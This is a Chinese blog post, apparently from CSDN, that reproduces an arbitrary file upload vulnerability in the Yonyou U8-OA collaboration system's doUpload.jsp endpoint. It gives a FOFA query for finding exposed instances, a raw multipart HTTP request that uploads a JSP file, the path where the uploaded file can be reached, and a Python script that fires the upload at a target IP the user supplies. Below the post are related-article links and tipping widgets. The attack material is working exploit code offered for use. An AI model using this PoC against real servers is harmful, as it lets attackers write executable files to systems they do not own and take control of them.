用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞

最新推荐文章于 2024-09-21 01:50:09 发布
最新推荐文章于 2024-09-21 01:50:09 发布
阅读量780 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: 漏洞复现 python 用友OA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/136271401
版权

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、系统介绍

用友协同云是新一代的企业社交化协同办公平台,不仅为企业提供协同办公服务,更作为企业数字化工作入口,服务企业内部员工、连接企业外部伙伴及上下游产业链。通过移动端、Web 端、PC桌面端等多端联动,为企业提供统一服务入口、沟通协作、办公协同、企业文化激活、业务协同等全方位的数智化工作平台。

2、漏洞介绍

用友U8-OA 协同工作系统遵循 J2EE 架构,以 JSP 和 JAVA BEAN 技术作为主要的系统实现手段,开发出了工作流、文档、消息提醒和插件接口。用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传漏洞。

3、FOFA语法

title="用友U8-OA"

4、漏洞复现 

POC

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 219
Content-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75

--7b1db34fff56ef636e9a5cebcd6c9a75
Content-Disposition: form-data; name="iconFile"; filename="info.jsp"
Content-Type: application/octet-stream

<% out.println("tteesstt"); %>
--7b1db34fff56ef636e9a5cebcd6c9a75--

上传完会返回文件路径,拼接路径:

http://xxxxxxxxx/yyoa/portal/upload/1708754672901.jsp

5、python检测脚本

import requests
 
def verify(ip):
 
    url = f'{ip}/yyoa/portal/tools/doUpload.jsp'
 
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Content-Length': '219',
        'Content-Type': 'multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75'
    }
    
    pyload='''
    --7b1db34fff56ef636e9a5cebcd6c9a75
    
    Content-Disposition: form-data; name="iconFile"; filename="info.jsp"
    Content-Type: application/octet-stream
    <% out.println("tteesstt1"); %>
    
    --7b1db34fff56ef636e9a5cebcd6c9a75--
    '''
 
    try:
        response = requests.post(url, headers=headers,data=pyload)
        if response.status_code == 200:
            print(f"{ip}存在用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞!!!")
    except Exception as e:
        pass
 
if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

用友U8+OA doUpload.jsp 文件上传漏洞复现
0xSec
02-08 878
用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个web服务器。
用友 U8 Cloud upload.jsp 文件上传漏洞复现
0xSec
12-12 1113
用友U8 Cloud upload.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
用友OA U8 test.jsp sql注入漏洞复现
qq_44828901的博客
06-21 2038
简单验证、复现漏洞
复现用友U8 oa协同工作系统 文件上传漏洞_57
fushuang333的博客
02-24 1282
复现用友U8 oa协同工作系统 文件上传漏洞上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 9017
用友OA/NC/NCCloud漏洞集合
用友U8二次开发,对接OA系统
最新发布
qq_39983008的博客
09-21 1572
最近碰到了一个需求,需要在OA系统中调用U8的单据信息进行审核,审核了需要回传ERP系统,由于用友U8在内网部署,外网无法连接,使用openapi又有各种坑,接口不全不说,经常莫名其妙报错,由于我的oa系统接口是通过java写的,所以直接调用用友的Api是行不通了,于是使用c#封装了一个webapi,在java中使用json格式传递单据参数,成功实现了OA跟ERP的对接。表头跟表体的id字段不需要自己赋值,U8里面重复了会自动生成新的id,新增成功后会返回新增的单据号跟单据id及响应内容。
某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
02-23 747
某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞,附带自己写的poc脚本
用友U8+ OA doUpload.jsp 接口文件上传
weixin_43567873的博客
03-06 156
用友U8+ OA doUpload.jsp 接口存在文件上传
金盘移动图书馆系统doUpload.jsp接口处文件上传
weixin_43567873的博客
03-07 126
金盘移动图书馆系统doUpload.jsp接口处文件上传
U8+OA V12.0 基础版安装维护手册
01-21
U8+OA V12.0 基础版安装维护手册
u8 oa使用手册
02-20
新版本U8OA的使用手册,主要讲如何配置及使用
如何讲清楚async和await?_,ajaxa,azqa,(1),2024年最新细节决定成败
2401_83974020的博客
04-20 1005
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。//那么这里就是在等待ajaxA请求的完成。//wait这个单词是等待的意思。
用友OA漏洞复现手册
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
【1day】用友GRP-U8 OA日志泄露漏洞学习
记录并分享学习安全的知识点..
09-29 386
用友GRP-U8 OA是一款企业级管理软件,主要面向中小型企业,提供全面的业务管理解决方案,包括财务、人力资源、采购、销售、仓库、生产等多个模块。用友GRP-U8 OA存在日志泄露漏洞,攻击者可以从系统或应用程序的日志中获取敏感信息的漏洞。这些敏感信息可能包括用户凭据、会话令牌、交易数据、个人身份信息等等。
高危CNVD|用友-U8-OA基础版存在文件上传漏洞getshell
2401_83799022的博客
06-18 771
1、先使用之前存在的任意文件上传漏洞上传一个jsp后缀文件到系统中,当然此处也可以直接使用系统中存在的jsp 文件直接覆盖写入,但存在破坏性。漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底部有版本信息。用友U8-OA基础版存在任意文件覆盖写入漏洞。到了此处高危CNVD就到手了!上传文件,文件内容为:11111。
u8+v13.0的OA功能是个摆设吗
weixin_44016789的博客
01-30 1010
u8+v13.0的OA功能是个摆设吗欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值